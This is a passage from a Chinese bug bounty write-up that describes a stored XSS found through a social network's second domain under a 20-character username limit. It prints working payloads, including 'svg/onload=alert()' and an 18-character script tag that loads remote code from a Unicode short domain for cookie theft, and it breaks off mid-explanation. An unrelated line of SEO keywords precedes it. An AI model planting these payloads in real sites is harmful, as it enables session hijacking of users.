商标查询网站怎么做,php 手机网站,株洲论坛,wordpress shift+enter大家好#xff0c;这是我编写的第一篇文章#xff0c;之所以会分享这个故事#xff0c;是因为我花了几个晚上的时间#xff0c;终于找到了解决某个问题的方法。故事如下#xff1a; 几个月前#xff0c;我被邀请参加一个非公共的漏洞悬赏项目#xff0c;在初期发现了一些… 大家好这是我编写的第一篇文章之所以会分享这个故事是因为我花了几个晚上的时间终于找到了解决某个问题的方法。故事如下 几个月前我被邀请参加一个非公共的漏洞悬赏项目在初期发现了一些漏洞后就再无收获。 而在最后5天里出于对金钱的渴望我告诉自己必须在整个项目结束之前再找到一些漏洞因此我又从头开始梳理整个目标。 这个目标是一个大型的社交网络而转折就发生在我去创建一个新的帐户时。 当我在用户名处输入一个XSS的payload时特殊字符: :’();?全不能输入而且长度限制为20个字符。 此时我没有太好的办法只能去寻找其他漏洞。 而当我访问目标范围内的第二个域名试图用我的电子邮件注册新帐户时被告知用户已经注册请登录。看来这两个网站使用的是同一个数据库的用户数据那么我可以借这个网站插入XSS么 我很快进入到“个人资料”页面尝试编辑我的用户名。是的的确没有了敏感字符限制 但是这个长度还是被限制在20个字符以内。 我首先输入一个简单的payload来确认XSS的存在svg/onloadalert()这个长度为20个字符。 输入并保存后我转向第一个网站并成功在“个人资料”页面发现了弹框 接下来我开始探究如何窃取cookie因为危害越大奖励越高。 不过由于无法绕过长度限制所以如何才能用小于20个字符的XSS来窃取cookiexsshunter工具的确很有用但payload都太长了所以我花费了很久的时间不停寻找新方法。48小时之后我发现了这条来自2016年的推特其中的payload的确很短来自0x6D6172696F script/src//⑭.₨只有18个字符。其中₨代表印度卢比这是1个字符而不是2个字符而⑭也是类似的效果。当你访问把这个url粘贴到浏览器去访问时会发现如下情形
